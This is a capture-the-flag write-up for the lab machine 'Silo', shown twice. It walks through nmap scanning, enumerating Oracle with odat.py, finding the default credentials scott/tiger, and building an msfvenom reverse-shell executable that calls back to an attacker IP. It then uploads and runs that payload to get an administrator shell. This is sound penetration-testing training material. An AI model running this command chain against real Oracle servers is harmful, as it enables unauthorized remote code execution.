Silo

Gaining Access

Nmap scan:

$ nmap -p- --min-rate 5000 10.129.95.188 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 08:12 EDT
Warning: 10.129.95.188 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.95.188
Host is up (0.013s latency).
Not shown: 65350 closed tcp ports (conn-refused), 170 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1521/tcp  open  oracle
5985/tcp  open  wsman
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49159/tcp open  unknown
49160/tcp open  unknown
49161/tcp open  unknown
49162/tcp open  unknown

Lots of ports, including some I'm not familiar with like port 1521.

Oracle RCE

I initially ran a few directory scans and SMB enumeration, but they all returned nothing interesting. So I decided to scan port 1521 in detail because I normally don't see that one.

$ sudo nmap -p 1521 -sC -sV -O -T4 10.129.95.188 
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 08:15 EDT
Nmap scan report for 10.129.95.188
Host is up (0.0073s latency).

PORT     STATE SERVICE    VERSION
1521/tcp open  oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)

So this was an Oracle port. Based on Hacktricks, we can try using odat.py to attack this.

We can run the enumeration to find all SIDs and possible passwords before attacking it.

$ ./odat.py all -s 10.129.95.188 -p 1521 
<TRUNCATED OUTPUT>
[+] SIDs found on the 10.129.95.188:1521 server: XE
[+] Service Name(s) found on the 10.129.95.188:1521 server: XE,XEXDB
[+] Valid credentials found: scott/tiger. Continue...

We found the database and also some credentials, which I think is enough to exploit this system easily. With these, we can upload a reverse shell onto the server rather easily.

First, we can create a reverse shell via msfvenom:

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.13 LPORT=443 -f exe -o rev.exe

Then we can run the following commands:

$ ./odat.py utlfile -s 10.129.95.188 -d XE -U scott -P tiger --sysdba --putFile \\temp rev.exe rev.exe

[1] (10.129.95.188:1521): Put the rev.exe local file in the \temp folder like rev.exe on the 10.129.95.188 server
[+] The rev.exe file was created on the \temp directory on the 10.129.95.188 server like the rev.exe file

$ ./odat.py externaltable -s 10.129.95.188 -p 1521 -d XE -U scott -P tiger --sysdba --exec \\temp rev.exe         

[1] (10.129.95.188:1521): Execute the rev.exe command stored in the \temp path

We would gain a reverse shell as the administrator.

PreviousShibboleth NextSolidState

Silo

Gaining Access

Nmap scan:

$ nmap -p- --min-rate 5000 10.129.95.188 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 08:12 EDT
Warning: 10.129.95.188 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.95.188
Host is up (0.013s latency).
Not shown: 65350 closed tcp ports (conn-refused), 170 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1521/tcp  open  oracle
5985/tcp  open  wsman
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49159/tcp open  unknown
49160/tcp open  unknown
49161/tcp open  unknown
49162/tcp open  unknown

Lots of ports, including some I'm not familiar with like port 1521.

Oracle RCE

I initially ran a few directory scans and SMB enumeration, but they all returned nothing interesting. So I decided to scan port 1521 in detail because I normally don't see that one.

$ sudo nmap -p 1521 -sC -sV -O -T4 10.129.95.188 
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 08:15 EDT
Nmap scan report for 10.129.95.188
Host is up (0.0073s latency).

PORT     STATE SERVICE    VERSION
1521/tcp open  oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)

So this was an Oracle port. Based on Hacktricks, we can try using odat.py to attack this.

GitHub - quentinhardy/odat: ODAT: Oracle Database Attacking ToolGitHub

We can run the enumeration to find all SIDs and possible passwords before attacking it.

$ ./odat.py all -s 10.129.95.188 -p 1521 
<TRUNCATED OUTPUT>
[+] SIDs found on the 10.129.95.188:1521 server: XE
[+] Service Name(s) found on the 10.129.95.188:1521 server: XE,XEXDB
[+] Valid credentials found: scott/tiger. Continue...

We found the database and also some credentials, which I think is enough to exploit this system easily. With these, we can upload a reverse shell onto the server rather easily.

First, we can create a reverse shell via msfvenom:

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.13 LPORT=443 -f exe -o rev.exe

Then we can run the following commands:

$ ./odat.py utlfile -s 10.129.95.188 -d XE -U scott -P tiger --sysdba --putFile \\temp rev.exe rev.exe

[1] (10.129.95.188:1521): Put the rev.exe local file in the \temp folder like rev.exe on the 10.129.95.188 server
[+] The rev.exe file was created on the \temp directory on the 10.129.95.188 server like the rev.exe file

$ ./odat.py externaltable -s 10.129.95.188 -p 1521 -d XE -U scott -P tiger --sysdba --exec \\temp rev.exe         

[1] (10.129.95.188:1521): Execute the rev.exe command stored in the \temp path

We would gain a reverse shell as the administrator.

PreviousShibboleth NextSolidState